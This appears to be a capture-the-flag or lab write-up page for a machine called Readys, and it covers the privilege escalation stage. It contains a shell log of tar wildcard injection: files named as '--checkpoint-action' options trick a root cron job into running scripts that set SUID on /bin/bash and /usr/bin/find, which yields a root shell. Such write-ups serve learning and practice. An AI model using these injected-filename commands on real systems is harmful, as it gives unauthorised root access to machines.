🐧
Readys
  • Readys
    • Summary
  • Enumeration
    • TCP
    • UDP
    • Web Services
      • Nikto
      • Dirb Extensions
      • Dirsearch
      • goBuster
      • Robots
      • WhatWeb
      • FeroxBuster
      • WPscan
    • Other Services
      • SSH
      • Redis
  • Exploitation
  • Priv Escalation
  • Notes
Powered by GitBook
On this page

Priv Escalation

PreviousExploitationNextNotes

Last updated 2 years ago

Crin job running as root see if we can modify it otherwise try mysql running on internal

Tar Wildcard Injection

The script changes to /var/www/html, this is a directory we have write access to.

alice@readys:/var/www/html$ echo "" > "--checkpoint-action=exec=sh demo.sh"
echo "" > "--checkpoint-action=exec=sh demo.sh"
alice@readys:/var/www/html$ echo "" > --checkpoint=1
echo "" > --checkpoint=1
alice@readys:/var/www/html$ echo "chmod u+s /usr/bin/find" > test.sh
echo "chmod u+s /usr/bin/find" > test.sh
alice@readys:/var/www/html$ echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > "--checkpoint-action=exec=sh test.sh"
alice@readys:/var/www/html$ echo "" > --checkpoint=1
echo "" > --checkpoint=1
alice@readys:/var/www/html$ echo "chmod +s /bin/bash" > exploit.sh
echo "chmod +s /bin/bash" > exploit.sh
alice@readys:/var/www/html$ touch ./"--checkpoint=1"
touch ./"--checkpoint=1"
alice@readys:/var/www/html$ touch ./"--checkpoint-action=exec=bash exploit.sh"
< touch ./"--checkpoint-action=exec=bash exploit.sh"

This is the ways I did it .

bash-5.0$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash
bash-5.0$ /bin/bash -p
bash-5.0# whoami
root
bash-5.0# ls -l /usr/bin/find
-rwsr-xr-x 1 root root 315904 Feb 16  2019 /usr/bin/find
bash-5.0#